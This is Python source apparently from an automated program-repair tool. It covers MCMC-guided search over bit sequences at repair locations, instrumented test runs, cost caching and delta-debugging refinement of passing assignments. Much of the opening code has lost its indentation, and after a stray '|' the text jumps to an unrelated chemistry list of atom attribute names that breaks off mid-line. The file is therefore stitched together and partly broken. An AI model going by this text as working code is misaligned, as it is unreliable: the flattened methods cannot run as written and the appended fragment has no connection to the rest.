            logger.info('accept. this is the last choice')
            log_ratio = 0
        return log_ratio
def post_accept_fun(self, accepted):
self.accepted_seq.append(accepted)
if not accepted:
self.cur_ebits_list = self.old_ebits_list
if self.trial_num >= self.search_max_trials:
raise TrialsExhausted(self.unique_trial, self.trial_num,
self.cost_seq, self.ratio_seq, self.accepted_seq)
def likelihood_logp(self, sample):
return 1
'''
Prob that chunk1 is tanferred to chunk2 in the MCMC sample space
'''
def prob_of_transfer(self, block1, ebits1, block2, ebits2):
if ebits1 == ebits2:
flip_count = Bin.flip_count_between_blocks(block1, block2)
return self.flip_prob(flip_count, ebits1)
elif ebits1 < ebits2:
delta = ebits2 - ebits1
shifted_block2 = Bin.rshift(block2, delta, self.chunk_bits)
flip_count = Bin.flip_count_between_blocks(block1, shifted_block2)
return self.flip_prob(flip_count, ebits1)
else:
assert ebits1 > ebits2
delta = ebits1 - ebits2
shifted_block1 = Bin.rshift(block1, delta, self.chunk_bits)
flip_count = Bin.flip_count_between_blocks(shifted_block1, block2)
p = 0
for i in range(delta):
p += sc.special.binom(delta, i) * self.flip_prob(flip_count + i, ebits1)
return p
    def rshift(self, block, n):
        """Right-shift `block` (an array of bit chunks) by `n` bits.

        Whole-chunk shifts drop trailing chunks (the result is shorter);
        the remaining n % chunk_bits bits are shifted with carry that
        appears to propagate toward later indices — TODO confirm the chunk
        ordering convention.

        NOTE(review): when n >= chunk_bits AND n is not a multiple of
        chunk_bits, the loop enumerates the full `block` while writing into
        the shorter `block_copy`, which looks like it would raise
        IndexError.  prob_of_transfer uses Bin.rshift, not this method —
        confirm whether this method is still live.
        """
        def get_next_carry(v, n_in_chunk):
            # bits shifted out of this chunk become the high bits of the next
            mask_bits = Bin.ones(n_in_chunk)
            return (v & mask_bits) << (self.chunk_bits - n_in_chunk)
        chunk_shift = int(np.floor(n / self.chunk_bits))
        block_copy = np.copy(block[0:len(block) - chunk_shift])
        n_in_chunk = n % self.chunk_bits
        if n_in_chunk != 0:
            cur_carry = 0
            for idx, chunk in enumerate(block):
                next_carry = get_next_carry(chunk, n_in_chunk)
                block_copy[idx] = (chunk >> n_in_chunk) | cur_carry
                cur_carry = next_carry
        return block_copy
'''
Prob that 'flips' bits in ebits are flippsed
'''
def flip_prob(self, flips, ebits):
if ebits == 0:
return self.mul_bits_flip_prob
if flips == 1:
# prob that a parituclar bit is flipped
p = self.one_bit_flip_prob / ebits
p += self.mul_bits_flip_prob / ((1 + ebits) * ebits)
else:
# prob that the number of flipped bits are "flips"
# possibility: none is flippled, two bits are flipped, ..., "bits" bits are flipped
p = self.mul_bits_flip_prob / ebits
p /= (1 + ebits)
# prob that a particular "flips" bits are flipped
p /= sc.special.binom(ebits, flips)
return p
def flip_count_between_chunks(self, c1, c2):
min_len = min(len(c1), len(c2))
if len(c1) != min_len:
# assert len(c1) > min_len
start = len(c1) - min_len
c1 = c1[start:]
if len(c2) != min_len:
# assert len(c1) > min_len
start = len(c2) - min_len
c2 = c2[start:]
count = 0
for i in range(len(c1)):
count += self.flip_count(c1[i], c2[i])
return count
'''
Return count of bit differences betwee a and b
'''
def flip_count(self, a, b):
def countSetBits(n):
count = 0
while n:
count += n & 1
n >>= 1
return count
rst = countSetBits(a ^ b)
return rst
def update_cost(self, sample, cost):
if cost is not None:
key = self.sample_to_key(sample, self.cur_ebits_list)
if key != ('',):
logger.debug('store the cost of {} [actual]'.format(key))
self.cost_dict.update({key: cost})
def update_cost_of_key(self, key, cost):
if cost is not None:
if key != ('',):
logger.debug('store the cost of {} [key]'.format(key))
self.cost_dict.update({key: cost})
def cost(self, sample) -> Tuple[Cost, Sample, bool]:
    """Return (cost, actual sample, whether the cost came from the cache).

    Looks the sample's key up in the cost cache; on a miss, runs a new
    trial via `new_cost` (which also updates `self.cur_ebits_list`) and
    stores the resulting cost.
    """
    key: Tuple[str, ...] = self.sample_to_key(sample, self.cur_ebits_list)
    logger.debug('search for the cost of {}'.format(key))
    # check if the sample is already tried before
    if key in self.cost_dict:
        logger.debug('{} cached'.format(key))
        cost = self.cost_dict.get(key)
        act_sample = sample
        is_cached_cost = True
    else:
        act_sample, self.cur_ebits_list, cost = self.new_cost(key, sample)
        is_cached_cost = False
        # TODO: if sample is shorter than actual sample,
        # there is no guarantee on deterministic behavior.
        # better to learn about deterministic behavior.
        # self.update_cost_of_key(key, cost)
        self.update_cost(act_sample, cost)
    # matches = [k for k in self.cost_dict.keys() if self.is_prefix(k, key)]
    # if len(matches) > 0:
    #     logger.debug('{} cached (prefix) by {}'.format(key, matches[0]))
    #     cost = self.cost_dict.get(matches[0])
    #     act_sample = sample
    #     is_cached_cost = True
    # else:
    #     act_sample, self.cur_ebits_list, cost = self.new_cost(key, sample)
    #     is_cached_cost = False
    #     # TODO: if sample is shorter than actual sample,
    #     # there is no guarantee on deterministic behavior.
    #     # better to learn about deterministic behavior.
    #     # self.update_cost_of_key(key, cost)
    #     self.update_cost(act_sample, cost)
    return cost, act_sample, is_cached_cost
'''
Return True if each component of t1 is a prefix of the corresponding
component of t2.
'''
def is_prefix(self, t1, t2):
    assert len(t1) == len(t2)
    return all(b.startswith(a) for a, b in zip(t1, t2))
def new_cost(self, key, sample):
    """Run a fresh trial for `sample` (keyed by `key`) and return
    (actual sample, enabled-bits list, extracted cost).

    Prepares proposal/trace/cost files, configures the environment for
    the instrumented test run, executes the test, and parses the
    resulting trace and cost files.  Raises AngelicValsFound as soon as
    a passing run is observed.
    """
    logger.debug('[new_cost] key: {}'.format(key))
    # logger.debug('[new_cost] sample: {}'.format(sample))
    # Decode each key string back into a per-location list of 0/1 ints.
    sample_bits = list(map(lambda x: [int(x[i:i + 1])
                                      for i in range(0, len(x))], key))
    # logger.debug('[new_cost] sample_bits: {}'.format(sample_bits))
    proposal_file, trace_file, cost_file, act_out_file = self.trial(sample_bits)
    self.remove_file(trace_file)
    self.remove_file(cost_file)
    self.remove_file(act_out_file)
    # NOTE(review): env values are assumed to already be strings;
    # confirm the config stores them that way.
    self.environment['ANGELIX_LOAD_JSON'] = proposal_file
    self.environment['ANGELIX_TRACE_AFTER_LOAD'] = trace_file
    self.environment['ANGELIX_COST_FILE'] = cost_file
    self.environment['ANGELIX_ACT_OUT'] = act_out_file
    self.environment['ANGELIX_COMPUTE_COST'] = 'YES'
    self.environment['PENALTY1'] = self.config['penalty1']
    self.environment['PENALTY2'] = self.config['penalty2']
    self.environment['ANGELIX_DEFAULT_NON_ZERO_COST'] = self.config['default_non_zero_cost']
    self.environment['ANGELIX_ERROR_COST'] = self.config['error_cost']
    self.environment['ANGELIX_WARNING_COST'] = self.config['warning_cost']
    # Choose the compiler wrapper.  (The original pre-assigned CC with a
    # conditional expression and immediately overwrote it with this
    # if/else; the redundant assignment was removed.)
    if self.config['use_gcc']:
        if self.config['use_frontend_for_test']:
            self.environment['CC'] = 'angelix-compiler --frontend'
        else:
            self.environment['CC'] = 'angelix-compiler --test'
    else:
        self.environment['CC'] = 'angelix-compiler --klee'
    try:
        passed = self.run_test(self.project, self.test, env=self.environment)
    except subprocess.TimeoutExpired:
        passed = False
    self.unique_trial += 1
    if passed is True:
        self.cost_seq.append(0)
        raise AngelicValsFound(trace_file, self.unique_trial, self.trial_num,
                               self.cost_seq, self.ratio_seq, self.accepted_seq)
    # Defaults: keep the incoming sample and current ebits.  Setting them
    # up front fixes a bug where `act_sample` could be referenced before
    # assignment if ExtractionFailure was raised during trace parsing.
    act_sample = sample
    ebits_list = self.cur_ebits_list
    try:
        logger.debug('trace_file: {}'.format(trace_file))
        trace = Trace.parse_trace_file(trace_file)
        if len(trace) > self.config['max_bits']:
            logger.warning('actual bits ({}) exceeds the maximum allowed bits ({})'.
                           format(len(trace), self.config['max_bits']))
        elif self.config['fixed_bv_len']:
            pass  # fixed bit-vector length: keep the defaults
        else:
            act_sample, ebits_list = self.sample_and_ebit_seq(trace)
    except ExtractionFailure:
        # Fall back to the defaults set above.
        ebits_list = self.cur_ebits_list
    logger.debug('cost file: {}'.format(cost_file))
    cost = self.extract_cost(cost_file)
    logger.debug('extracted cost: {}'.format(cost))
    return act_sample, ebits_list, cost
def extract_cost(self, cost_file):
    """Read the cost produced by an instrumented run from `cost_file`.

    Returns the configured default maximum cost when the file is
    missing/unreadable, the current maximum recorded cost for a literal
    'max_cost' marker, and None for unrecognized content.  With
    config['random_cost'] set, returns a random cost instead of reading
    the file.  (The wrong `-> int` annotation was dropped: the result
    may be a float, a numpy integer, or None.)
    """
    if self.config['random_cost']:
        # Renamed from `range`, which shadowed the builtin.
        cost_range = np.arange(0, self.config['default_max_cost'] + 1)
        return np.random.choice(cost_range)
    # Read the file directly instead of shelling out to `cat` via
    # subprocess (slow, and unsafe for paths with shell metacharacters).
    try:
        with open(cost_file) as f:
            cost_txt = f.read()
    except OSError:
        logger.warning('cost file missing: {}'.format(cost_file))
        return self.config['default_max_cost']
    try:
        cost = float(cost_txt)
    except ValueError:
        cost_txt = cost_txt.replace('\n', '')
        if cost_txt == 'max_cost':
            cost = self.max_cost()
            logger.warning('extract the current max cost: {}'.format(cost))
        else:
            logger.warning('unrecognized cost {} in {}'.format(cost_txt, cost_file))
            cost = None
    return cost
def max_cost(self):
    """Largest cost recorded so far, or the configured default when the
    cache is empty."""
    recorded = self.cost_dict.values()
    return max(recorded, default=self.config['default_max_cost'])
def get_proposal_dir(self):
    """Return the proposal directory for the current test, creating the
    search directory and the proposal subdirectory on demand."""
    search_dir = self.searchDir[self.test]
    for directory in (search_dir, join(search_dir, 'proposal')):
        if not os.path.exists(directory):
            mkdir(directory)
    return join(search_dir, 'proposal')
def trial(self, proposal: List[List[int]]):
    """Write the proposal JSON for the current trial and return the
    paths of the proposal, trace, cost, and actual-output files."""
    logger.debug('proposal: {}'.format(proposal))
    logger.debug('locations: {}'.format(self.c_locs))
    assert len(proposal) == len(self.c_locs)
    proposal_dir = self.get_proposal_dir()
    proposal_file = join(proposal_dir, 'proposal' + str(self.trial_num) + '.json')
    # One entry per location, keyed by its dash-joined id.
    proposal_dict = dict()
    for idx, c_loc in enumerate(self.c_locs):
        key = reduce((lambda x, y: '{}-{}'.format(x, y)), c_loc)
        proposal_dict[key] = proposal[idx]
    with open(proposal_file, 'w') as file:
        file.write(json.dumps(proposal_dict))
    def _numbered_path(kind):
        # Ensure <searchDir>/<kind>/ exists; return <kind><trial_num> in it.
        directory = join(self.searchDir[self.test], kind)
        if not os.path.exists(directory):
            mkdir(directory)
        return join(directory, kind + str(self.trial_num))
    cur_trace_file = _numbered_path('trace')
    cost_file = _numbered_path('cost')
    act_out_file = _numbered_path('act_out')
    return proposal_file, cur_trace_file, cost_file, act_out_file
def to_loc_id_str(self, loc_id: tuple):
    """Render a location id tuple like (1, 2, 3) as '1-2-3'.

    Bug fix: the original computed the string but never returned it,
    so every call yielded None.
    """
    return reduce((lambda x, y: '{}-{}'.format(x, y)), loc_id)
def sample_to_key(self, sample, ebits_list):
    """Render a sample (list of chunk blocks) as a tuple of bit strings,
    one per location, keeping only each block's enabled bits."""
    def block_to_bin_str(block, ebits):
        # Number of chunks actually needed to hold `ebits` bits.
        act_chunks_in_block = int(np.ceil(ebits / self.chunk_bits))
        unpadded_block = block[len(block) - act_chunks_in_block:len(block)]
        bin = ""
        for idx, chunk in enumerate(unpadded_block):
            if idx == 0:
                # The leading chunk only holds the remainder bits.
                # NOTE(review): when ebits is a non-zero multiple of
                # chunk_bits, `ebits % self.chunk_bits` is 0 and the
                # leading chunk renders as an empty string — confirm
                # this is the intended behavior.
                bin += Bin.bin_str(chunk, ebits % self.chunk_bits)
            else:
                bin += Bin.bin_str(chunk, self.chunk_bits)
        return bin
    return tuple([block_to_bin_str(block, ebits)
                  for block, ebits in zip(sample, ebits_list)])
def sample_and_ebit_seq(self, trace,
                        init=False,
                        allow_expand=False) -> Tuple[Sample, EBitsSeq]:
    """Extract per-location value chunks and enabled-bit counts from a
    parsed trace and normalize them into a (sample, ebits list) pair."""
    # Trace entries are tuples; position 1 holds the location, 2 the value.
    loc_idx = 1
    val_idx = 2
    def _extract(loc: Tuple[int, int, int, int]):
        # All values recorded for this location, in trace order.
        extracted_bits = [t[val_idx] for t in trace if t[loc_idx] == loc]
        bits = list(map(Bin.normalize_bit, extracted_bits))
        val_chunks = self.bits_to_chunks(bits)
        return val_chunks, len(extracted_bits)
    vals_ebits_list = [_extract(loc) for loc in self.c_locs]
    return self.sample_and_ebits(vals_ebits_list, init=init, allow_expand=allow_expand)
def extract_start(self) -> Tuple[Sample, EBitsSeq]:
    """Build the initial (sample, ebits list) pair from the trace file
    of the original run, grepping one location at a time.

    Raises ExtractionFailure when a location never occurs in the trace
    (grep exits non-zero on no match).
    """
    trace_file = join(self.working_dir, "trace", self.test)
    logger.debug('trace_file: {}'.format(trace_file))
    val_idx = 2
    def _extract(loc):
        # Match lines like "I, <loc fields>," for this location.
        # NOTE(review): the pattern is interpolated into a shell command;
        # fine for numeric location ids, but would break on paths or ids
        # containing shell metacharacters.
        pattern = '\"^[IL], ' + reduce((lambda x, y: '{} {}'.format(x, y)), loc) + ',\"'
        try:
            lines = subprocess.check_output('grep ' + pattern + ' ' + trace_file,
                                            shell=True).decode('ascii').splitlines()
        except subprocess.CalledProcessError:
            # lines = []
            raise ExtractionFailure
        extracted_bits = list(map(lambda line: line.split(',')[val_idx].strip(), lines))
        bits = list(map(Bin.normalize_bit, extracted_bits))
        val_chunks = self.bits_to_chunks(bits)
        return np.array(val_chunks), len(lines)
    chunks_ebits_list = [_extract(loc) for loc in self.c_locs]
    logger.debug('chunks_ebits_list: {}'.format(chunks_ebits_list))
    return self.sample_and_ebits(chunks_ebits_list, init=True)
'''
Each control sequence consists of an array of bits (i.e., a seq-chunk)
and the number of enabled bits (i.e., ebits).
The actual enabled bits are the last N bits of the seq-chunk where N is ebits.
'''
def sample_and_ebits(self, block_ebits_list: List[BlockEbits],
                     init=False, allow_expand=False) -> Tuple[Sample, EBitsSeq]:
    """Normalize per-location (block, ebits) pairs into a fixed-width
    sample: every block is zero-padded to `self.chunks_in_block` chunks.

    Raises ChunkOverFlow when a block does not fit and expansion is not
    allowed.
    """
    block = [pair[0] for pair in block_ebits_list]
    ebits = [pair[1] for pair in block_ebits_list]
    if init:
        # Establish the block width, leaving headroom via the expand factor.
        if len(block) == 0:
            self.init_chunks_in_block(0)
        else:
            self.init_chunks_in_block(
                int(np.ceil(max(map(len, block)) * self.block_expand_factor)))
    if allow_expand:
        # Grow the width to fit the largest incoming block.
        new_chunks_in_block = max(self.chunks_in_block, max(map(len, block)))
        logger.debug('old chunks_in_block: {}'.format(self.chunks_in_block))
        logger.debug('new chunks_in_block: {}'.format(new_chunks_in_block))
        self.init_chunks_in_block(new_chunks_in_block)
    sample = []
    for idx, chunk in enumerate(block):
        if len(chunk) > self.chunks_in_block:
            logger.info('ChunkOverFlow')
            # logger.info('chunk = {}'.format(chunk))
            logger.info('chunk len = {}'.format(len(chunk)))
            logger.info('chunk size = {}'.format(self.chunks_in_block))
            logger.info('ebits = {}'.format(block_ebits_list[idx][1]))
            assert len(chunk) <= self.config['max_bits']
            raise ChunkOverFlow(block_ebits_list[idx][1])
        else:
            sample.append(self.pad_chunk(chunk))
    return sample, ebits
def get_angelic_paths(self, trace_file, locs: List[Location], ebits_list: List[Ebits]):
    """Reconstruct angelic paths for `locs` from a passing trace file.

    For each location, at most its enabled-bits count of entries is
    taken; each entry is (angelic boolean, None, parsed context).
    Returns a single-element list containing the per-location
    specification dict.
    """
    assert len(locs) == len(ebits_list)
    # Number of trace entries consumed so far per location.
    loc_count_dict: Dict[Location, int] = dict()
    for loc in locs:
        loc_count_dict.update({loc: 0})
    # Cap of entries (enabled bits) per location.
    loc_ebits_dict: Dict[Location, int] = dict()
    for idx, loc in enumerate(locs):
        loc_ebits_dict.update({loc: ebits_list[idx]})
    spec_dict = dict()
    with open(trace_file) as f:
        for _, line in enumerate(f):
            try:
                commas = line.count(', ')
                if commas == 3:
                    dc, raw_loc, angelic, ctxt = line.split(', ', maxsplit=3)
                elif commas == 2:
                    dc, raw_loc, angelic = line.split(', ', maxsplit=2)
                    ctxt = None
                elif commas == 4:
                    # NOTE(review): the trailing `rest` field is discarded.
                    dc, raw_loc, angelic, ctxt, rest = line.split(', ', maxsplit=4)
                else:
                    raise Exception('Ill-formed line: {}'.format(line))
            except ValueError as e:
                logger.warning('failed to parse line: {}'.format(line))
                raise e
            loc = Trace.parseLoc(raw_loc)
            if loc not in locs:
                continue
            if loc_count_dict[loc] >= loc_ebits_dict[loc]:
                continue
            loc_count_dict.update({loc: loc_count_dict[loc] + 1})
            if spec_dict.get(loc) is None:
                spec_dict[loc] = [(True if int(angelic) == 1 else False,
                                   None,
                                   Trace.parseCtxt(ctxt))]
            else:
                spec_dict[loc].append((True if int(angelic) == 1 else False,
                                       None,
                                       Trace.parseCtxt(ctxt)))
    return [spec_dict]
'''
The number of elements in a seq-chunk.
'''
def init_chunks_in_block(self, size):
    # Fixed width (in chunks) that every block is padded to.
    self.chunks_in_block = size
def pad_chunk(self, chunk):
    """Zero-pad `chunk` up to `self.chunks_in_block` entries; an
    already-full chunk is returned as a numpy array unchanged."""
    assert len(chunk) <= self.chunks_in_block
    shortfall = self.chunks_in_block - len(chunk)
    if shortfall == 0:
        return np.array(chunk)
    return Bin.pad_zeros(chunk, shortfall, 0, int)
def bits_to_chunks(self, bits):
    """Pack a flat list of bit characters into integer chunks of
    `self.chunk_bits` bits each, left-padding with zeros so the length
    becomes a multiple of the chunk size."""
    # logger.debug('[bits_to_chunks] bits: {}'.format(bits))
    pad_len = (self.chunk_bits - (len(bits) % self.chunk_bits)) % self.chunk_bits
    padded_bits = Bin.pad_zeros(bits, pad_len, 0, str)
    bits_chunks = list(self.chunks(padded_bits, self.chunk_bits))
    val_chunks = list(map(self.bit_to_val, bits_chunks))
    return val_chunks
def bit_to_val(self, bits):
    """Interpret a sequence of '0'/'1' characters as a binary integer."""
    return int(''.join(bits), 2)
'''
Given a flattened list, return a generator of chunks of `size` elements
each; the final chunk may be shorter.
'''
def chunks(self, lst, size):
    start = 0
    while start < len(lst):
        yield lst[start:start + size]
        start += size
def remove_file(self, f):
    """Delete `f` when it exists; a missing path is a no-op."""
    if not os.path.exists(f):
        return
    os.remove(f)
def set_q0(self, q0: Sample):
    """Set the current sample; on the very first trial, also snapshot a
    deep copy of (sample, ebits) as the initial state."""
    self.q0 = q0
    if self.is_first_trial:
        # Deep-copy the blocks so later in-place mutation of q0 cannot
        # corrupt the recorded initial state.
        q0_copy = []
        for block in q0:
            q0_copy.append(np.copy(block))
        self.init_sample_and_ebit_seq = (q0_copy, self.cur_ebits_list.copy())
        self.is_first_trial = False
class DeltaType(Enum):
    """Kind of delta currently being minimized by delta debugging."""
    UNDEF = 1
    LOC = 2  # deltas are repair-location indices
    BIT = 3  # deltas are bit positions within one location
class AngelicForestRefine(DD):
    """Delta-debugging refinement of an angelic forest.

    Starting from a passing (angelic) bit assignment and the initial
    assignment, minimizes with ddmin (inherited from DD) first the set
    of repair locations and then, per location, the set of differing
    bits that are required for the test to keep passing.
    """
    def __init__(self, inferrer: GuidedInferrer, project, test_id, environment,
                 dd_dir, locations, c_locs, run_test):
        DD.__init__(self)
        self.inferrer = inferrer
        self.chunk_bits = inferrer.chunk_bits
        self.project = project
        self.test_id = test_id
        self.environment = environment
        self.dd_dir = dd_dir
        self.locations = locations
        self.c_locs = c_locs
        self.run_test = run_test
        # Filled in by __call__; deltas are interpreted according to
        # delta_type (location indices vs bit positions).
        self.angelic: List[BlockEbits] = []
        self.init: List[BlockEbits] = []
        self.delta_type = DeltaType.UNDEF
        self.target_loc = -1
        self.last_passing_trace_file = None

    def __call__(self, angelic_sample_and_ebits_list,
                 init_sample_and_ebits_list, trace_file) -> Tuple[List[AngelicPath], TraceFile]:
        """Run location-level then bit-level DD; return the angelic paths
        and the last passing trace file.

        Raises EbitsDDFailure when bit-level minimization fails for some
        location (LocDDFailure may propagate from dd_locations).
        """
        self.instance = 0
        self.last_passing_trace_file = trace_file
        angelic: List[BlockEbits] = self.block_ebits_list(angelic_sample_and_ebits_list)
        init: List[BlockEbits] = self.block_ebits_list(init_sample_and_ebits_list)
        assert len(angelic) > 0
        assert len(init) == len(angelic)
        logger.info('angelic: {}'.format(angelic))
        logger.info('init: {}'.format(init))
        self.angelic, self.init = self.adjust_block_size(angelic, init)
        one_minimal_loc = self.dd_locations()
        min_locs = list(map(lambda idx: self.c_locs[idx], one_minimal_loc))
        min_angelic = list(map(lambda idx: self.angelic[idx], one_minimal_loc))
        min_init = list(map(lambda idx: self.init[idx], one_minimal_loc))
        min_init_ebits = list(map(lambda t: t[1], min_init))
        for i in range(len(min_angelic)):
            self.target_loc = one_minimal_loc[i]
            dd_failed, _ = self.dd_ebits(min_angelic[i], min_init[i], one_minimal_loc[i])
            if dd_failed:
                raise EbitsDDFailure(min_locs, min_init_ebits)
        # pass min_init_ebits to prune
        ap = self.inferrer.get_angelic_paths(self.last_passing_trace_file,
                                             min_locs, min_init_ebits)
        return ap, self.last_passing_trace_file

    def adjust_block_size(self, angelic: List[BlockEbits], init: List[BlockEbits]):
        """Zero-pad each init block up to its angelic block's length so
        the two can be compared chunk by chunk."""
        for idx, (angelic_block, angelic_ebits) in enumerate(angelic):
            init_block, init_ebits = init[idx]
            if len(angelic_block) > len(init_block):
                logger.debug('angelic block is bigger than init block')
                init_block = Bin.pad_zeros(init_block,
                                           len(angelic_block) - len(init_block), 0, int)
                init[idx] = (init_block, init_ebits)
        return angelic, init

    def dd_locations(self):
        """ddmin over the indices of locations whose (block, ebits) pair
        differs between the angelic and init assignments.

        Raises LocDDFailure when the minimization itself fails.
        """
        def compare_block_ebits(pair):
            # True when the two (block, ebits) pairs are identical.
            block_a = pair[0][0]
            ebits_a = pair[0][1]
            block_b = pair[1][0]
            ebits_b = pair[1][1]
            assert len(block_a) == len(block_b)
            logger.debug('[compare_block_ebits] block_a: {}'.format(block_a))
            logger.debug('[compare_block_ebits] block_b: {}'.format(block_b))
            if len(block_a) == 0:
                return (ebits_a == ebits_b)
            else:
                return (block_a == block_b).all() and (ebits_a == ebits_b)
        diffs = list(map(compare_block_ebits, zip(self.angelic, self.init)))
        logger.debug('diffs: {}'.format(diffs))
        all_deltas = []
        for i, cmp in enumerate(diffs):
            if not cmp:
                all_deltas.append(i)
        logger.debug('all_deltas (locs): {}'.format(all_deltas))
        self.delta_type = DeltaType.LOC
        if len(all_deltas) > 0:
            try:
                one_minimal = self.ddmin(all_deltas)
            except Exception as e:
                logger.warning('DD failed (locs): {}'.format(e))
                one_minimal = []
                raise LocDDFailure()
        else:
            one_minimal = []
        logger.debug('one_minimal (locs): {}'.format(one_minimal))
        return one_minimal

    def dd_ebits(self, angelic: BlockEbits, init: BlockEbits, loc_idx: int):
        """ddmin over the bit positions at which the angelic and init
        blocks of one location differ; returns (dd_failed, one_minimal).

        When the enabled-bit counts differ, the init block is first
        shifted/aligned so that both blocks describe the same bit span.
        """
        def diff_block_ebits(block_a: Block, block_b: Block, chunk_bits):
            # Bit positions (counted from the start of the block) at
            # which the two blocks disagree.
            logger.debug('block_a: {}'.format(block_a))
            logger.debug('block_b: {}'.format(block_b))
            logger.debug('chunk_bits: {}'.format(chunk_bits))
            assert len(block_a) == len(block_b)
            diff_list = []
            diff_idx = 0
            for idx, chunk in enumerate(block_a):
                if block_a[idx] == block_b[idx]:
                    diff_idx += chunk_bits
                else:
                    bin_str_a = Bin.bin_str(block_a[idx], chunk_bits)
                    bin_str_b = Bin.bin_str(block_b[idx], chunk_bits)
                    # NOTE(review): the inner loop reuses the name `idx`,
                    # shadowing the enumerate index; harmless because
                    # enumerate reassigns it on the next iteration, but
                    # easy to misread.
                    for idx in range(chunk_bits):
                        if bin_str_a[idx] != bin_str_b[idx]:
                            diff_list.append(diff_idx)
                        diff_idx += 1
            return diff_list
        logger.debug('angelic (bits): {}'.format(angelic))
        logger.debug('init (bits): {}'.format(init))
        angelic_block = angelic[0]
        angelic_ebits = angelic[1]
        init_block = init[0]
        init_ebits = init[1]
        chunk_bits = self.chunk_bits
        # Work on a copy so test_for_bit can patch the target location.
        self.init_aligned = self.init.copy()
        if angelic_ebits == init_ebits:
            all_deltas = diff_block_ebits(angelic_block, init_block, chunk_bits)
        elif angelic_ebits > init_ebits:
            # Grow the init block: shift left and take the extra leading
            # bits from the angelic block.
            delta = angelic_ebits - init_ebits
            init_block_shifted = Bin.lshift(init_block, delta, chunk_bits)
            logger.debug('init_block_shifted: {}'.format(init_block_shifted))
            init_block_aligned = Bin.copy_last_bits(angelic_block, delta,
                                                    init_block_shifted, chunk_bits)
            logger.debug('init_block_aligned: {}'.format(init_block_aligned))
            self.init_aligned[loc_idx] = (init_block_aligned, self.angelic[loc_idx][1])
            all_deltas = diff_block_ebits(angelic_block, init_block_aligned, chunk_bits)
        else:
            # Shrink the init block down to the angelic width.
            assert init_ebits > angelic_ebits
            delta = init_ebits - angelic_ebits
            init_block_shifted = Bin.rshift(init_block, delta, chunk_bits)
            all_deltas = diff_block_ebits(angelic_block, init_block_shifted, chunk_bits)
        logger.debug('all_deltas (bits): {}'.format(all_deltas))
        dd_failed = False
        if len(all_deltas) > 0:
            self.delta_type = DeltaType.BIT
            try:
                one_minimal = self.ddmin(all_deltas)
            except Exception:
                logger.warning('DD failed (ebits)')
                dd_failed = True
                one_minimal = []
        else:
            one_minimal = []
        logger.debug('one_minimal (bits): {}'.format(one_minimal))
        return dd_failed, one_minimal

    def _test(self, deltas):
        """DD framework callback: report whether applying `deltas` to the
        init assignment makes the test pass (PASS) or fail (FAIL)."""
        assert self.delta_type == DeltaType.LOC or self.delta_type == DeltaType.BIT
        if len(deltas) == 0:
            logger.debug('test({}) = FAIL'.format(deltas))
            return self.FAIL
        if self.delta_type == DeltaType.LOC:
            return self.test_for_loc(deltas)
        else:
            return self.test_for_bit(deltas)

    def test_for_bit(self, deltas) -> TestOut:
        """Copy the selected angelic bits of the target location into the
        aligned init assignment, then run the test."""
        logger.debug('deltas (bit): {}'.format(deltas))
        init_copy: List[BlockEbits] = self.init_aligned.copy()
        for delta in deltas:
            init_copy[self.target_loc] = (Bin.copy_bit(self.angelic[self.target_loc][0],
                                                       delta,
                                                       init_copy[self.target_loc][0],
                                                       self.chunk_bits),
                                          init_copy[self.target_loc][1])
        logger.debug('init_copy (bit): {}'.format(init_copy))
        return self.test_common(init_copy, deltas)

    def test_for_loc(self, deltas) -> TestOut:
        """Replace whole locations of the init assignment with their
        angelic counterparts, then run the test."""
        logger.debug('deltas (locs): {}'.format(deltas))
        init_copy = self.init.copy()
        for delta in deltas:
            init_copy[delta] = self.angelic[delta]
        logger.debug('init_copy (locs): {}'.format(init_copy))
        return self.test_common(init_copy, deltas)

    def test_common(self, init, deltas) -> TestOut:
        """Run (or reuse a cached verdict for) the assignment `init`.

        A key already present in the inferrer's cost cache — exactly or
        as a prefix — is known to fail, so the test is not re-run.
        """
        sample = []
        ebits_list = []
        for (block, ebits) in init:
            sample.append(block)
            ebits_list.append(ebits)
        key = self.inferrer.sample_to_key(sample, ebits_list)
        if key in self.inferrer.cost_dict:
            test_rst = self.FAIL
        else:
            matches = [k for k in self.inferrer.cost_dict.keys()
                       if self.inferrer.is_prefix(k, key)]
            if len(matches) > 0:
                test_rst = self.FAIL
            else:
                test_rst = self.invoke_test(key, deltas, self.c_locs)
        logger.debug('test({}) = {}'.format(deltas, test_rst))
        return test_rst

    def invoke_test(self, key, deltas, c_locs):
        """Materialize `key` as a proposal file, run the project test
        with it, and translate the outcome into PASS/FAIL."""
        # Decode each key string back into a list of 0/1 ints.
        proposal = list(map(lambda x: [int(x[i:i + 1])
                                       for i in range(0, len(x))], key))
        proposal_file, trace_file = self.trial(proposal, c_locs)
        self.inferrer.remove_file(trace_file)
        self.environment['ANGELIX_LOAD_JSON'] = proposal_file
        self.environment['ANGELIX_TRACE_AFTER_LOAD'] = trace_file
        passed = self.run_test(self.project, self.test_id, env=self.environment)
        self.instance += 1
        if passed:
            if self.delta_type == DeltaType.BIT:
                # Remember the trace of the latest passing bit-level run;
                # it is used to rebuild the angelic paths afterwards.
                self.last_passing_trace_file = trace_file
            return self.PASS
        else:
            return self.FAIL

    def trial(self, proposal, c_locs):
        """Write the proposal JSON for this DD instance and return the
        (proposal_file, trace_file) paths."""
        proposal_dir = join(self.dd_dir[self.test_id], 'proposal')
        if not os.path.exists(proposal_dir):
            mkdir(proposal_dir)
        proposal_file = join(proposal_dir, 'proposal' + '.json')
        proposal_dict = dict()
        for idx, c_loc in enumerate(c_locs):
            key = reduce((lambda x, y: '{}-{}'.format(x, y)), c_loc)
            proposal_dict[key] = proposal[idx]
        with open(proposal_file, 'w') as file:
            file.write(json.dumps(proposal_dict))
        trace_dir = join(self.dd_dir[self.test_id], 'trace')
        if not os.path.exists(trace_dir):
            mkdir(trace_dir)
        trace_file = join(trace_dir, 'trace' + str(self.instance))
        return proposal_file, trace_file

    def block_ebits_list(self, sample_and_ebits_list):
        """Zip a (sample, ebits list) pair into a list of (block, ebits)
        tuples, one per location."""
        sample = sample_and_ebits_list[0]
        ebits_list = sample_and_ebits_list[1]
        return list(zip(sample, ebits_list))
|
# Attribute names tracked on every AtomType (see AtomType below).
atom_attrs = ['name',
              'atomic_num',
              'bond_degree_no_Hs',
              'bond_degree_with_Hs',
              'total_bond_degree',
              'explicit_valence',
              'implicit_valence',
              'total_valence',
              'formal_charge',
              'hybridization',
              'is_aromatic',
              'in_ring',
              'isotope',
              'mass',
              'num_radical_electrons',
              'element',
              'num_Hs',
              'monomer_type',
              'pdb_name',
              'pdb_insertion_code',
              # Bug fix: a missing comma after 'pdb_occupancy' used to fuse
